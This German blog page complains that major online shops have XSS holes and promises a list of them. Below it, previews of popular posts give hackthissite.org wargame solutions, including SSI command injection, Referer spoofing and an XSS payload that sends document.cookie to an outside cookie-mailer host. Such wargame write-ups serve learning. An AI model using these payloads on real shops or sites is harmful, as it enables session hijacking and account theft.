Direkt zum Hauptbereich

Große Online Shops mit XSS Lücken

Es wundert mich wirklich dass es so viele Seiten gibt welche für XSS anfällig sind.
Bisher waren es ja nur, in anführungszeichen, Ministerien,bundestag und das ein oder andere Social Network. Aber dass es tatsächlich auch Online Shops gibt welche XSS anfällige Seiten haben dass ist mir neu. Darunter sind auch Shops mit dem achso tollen "trusted Shop" Siegel.

Uhh ein "trusted Shop" da fühl ich mich gleich sicherer und kann mich ja einloggen. Schwups sind die Zugangsdaten verschwunden.
Da hätt ich doch besser ein Handtuch mitgenommen dann wär dass nicht passiert.
Zurück zur Sicherheit. Also ich hab mich nun ein bisschen umgeschaut und es ist erstunlich was man mit dem ein oder anderen Online Shop so alles anstellen kann.
Und erstaunlich auf vielen Shops kann man iframes einbetten, JavaScript ausführen, neue Login Seiten erstellen.

Also ganz gesund ist dass ja nicht. Und ich möchte nicht wissen wie viele Menschen die Lücken in Online Shops schon ausnutzen um aktiv Daten auszuspionieren.

Vielleicht sollten sich die Herren mit Ihren Millionengewinnen ein paar 10 Tausend Euros im Jahr für einen Menschen ausgeben der sich um die Sicherheit ihrer Seite und der IT-Landschaft kümmert.

Das schmälert zwar den Gewinn schafft aber Glückliche Kunden und ein tolles Image. Demnächst werden zum Thema Shop weitere Infos Folgen. Ich bereite nun einen kleinen Artikel zu diesem Thema vor und dieser wird demnächst hier veröffentlicht mit einer Liste von Online Shops welche davon betroffen sind.

Kommentare

Beliebte Posts aus diesem Blog

hackthissite.org Level 8 Basic Lösung

Hier ist ein eingabeformular in welches du deinen Namen schreiben sollst damit es eine Datei anlegen kann. Zum besseren Verständniss einfach mal testen, also "Mustermann" und auf submit klicken. Nun erscheint der Text: Your file has been saved. Please click here view the file. Hier ist die URL der Datei, welche angelegt wurde: http://www.hackthissite.org/missions/basic/8/tmp/mnxdljrz.shtml Genau, es ist eine shtml Datei also ein Server Side Include (SSI) damit kann man Befehle auf dem Server ausführen lassen und das ergebniss wird dann dem client übergeben! Hier musst du aber das Verzeichniss auslesen damit wir informationen über den Inhalt bekommen. Geb nun einfach mal folgendes in das Feld für den Namen ein: Richtig, ls bei unix/linux "list directory" zeigt den Inhalt eines Verzeichnisses an. Das neu hinzugefügte hier ist "ls ../" ../ heißt ein Verzeichniss nach oben. Also nicht in http://www.hackthissite.org/missions/basic/...

hackthissite.org Level 5 Basic Lösung

Level 5 ist fast gleich wie der Level 4 nur mit dem kleinen Unterschied dass das Skript auf dem Server nun auch schaut woher die Anfrage kommt. Es überprüft also die Referer Url. Damit wir dies umgehen können wird das Skript aus 4 nur Modifiziert. Der HTTP Anfrage wird folgende Zeile hinzugefügt: Referer:http://www.hackthissite.org/missions/basic/5/index.php\r\n So und schon ist auch dass Problem behoben! Das Skript level5.php gibts auch zum Download.

HTS realistic 9, the Codes for the Challenge!

Here are the javascript codes for HTS Level 9: 1. code, take a look at the cookie: javascript:alert(document.cookie); 2. The xss exploit insert into the message to mr. crap: </textarea> <script>window.location="http://getTheScript/getcookiemailer.php?keks="+document.cookie;</script> 3. The code to use the stolen cookie data: javascript:document.cookie="strUsername=m-crap%40crappysoft.com";document.cookie="strPassword=94a35a3b7befff5eb2a8415af04aa16c";document.cookie="intID=1"; Now you can move the money!! 4. Deleting the session data. Log out and go to the main page of crappy soft. Go to the mailing list form. Now you need an Firefox extension like UrlParams or an Proxy with freeze function. Or you manipulate the Post data with an faked http header. How to fake http header with PHP you can take a look at this page: http://hack1n9.blogspot.com/2008/06/hackthissiteorg-level-5-basic-lsung.html But it is written in german. The faste...